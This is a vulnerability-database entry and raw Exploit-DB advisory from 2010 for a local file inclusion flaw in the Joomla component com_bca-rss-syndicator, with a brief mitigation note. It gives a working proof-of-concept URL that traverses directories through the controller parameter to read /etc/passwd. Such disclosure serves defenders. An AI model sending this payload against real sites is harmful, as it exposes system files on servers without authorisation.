header-logo
Suggest Exploit
vendor:
com_bca-rss-syndicator
by:
Vrs-hCk
7,5
CVSS
HIGH
Local File Inclusion (LFI)
22
CWE
Product Name: com_bca-rss-syndicator
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component com_bca-rss-syndicator LFI Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The request should contain a maliciously crafted parameter value that contains directory traversal characters (e.g. “../”) to access files outside of the web root folder. An example of such a request is http://localhost/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../etc/passwd%00

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user-supplied input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

 ================================================================================================

 Title    : Joomla Component com_bca-rss-syndicator LFI Vulnerability
 Date     : Monday, 05 April 2010 (Indonesia)
 Author   : Vrs-hCk
 Contact  : ander[at]antisecurity.org
 Blog     : http://c0li.blogspot.com/

 ================================================================================================

 [+] Exploit

     http://[site]/[path]/index.php?option=com_bca-rss-syndicator&controller=[LFI]

 [+] PoC

     http://localhost/index.php?option=com_bca-rss-syndicator&controller=../../../../../../../etc/passwd%00

 ================================================================================================

 Greetz   :

     www.MainHack.net - www.ServerIsDown.org - www.AntiSecurity.org
     Paman, NoGe, OoN_Boy, pizzyroot, zxvf, matthews, Genex, s4va, stardustmemory,
     wishnusakti, bl4Ck_3n91n3, H312Y, S3T4N, xr00tb0y, str0ke, dkk.

 ================================================================================================

# c0li.m0de.0n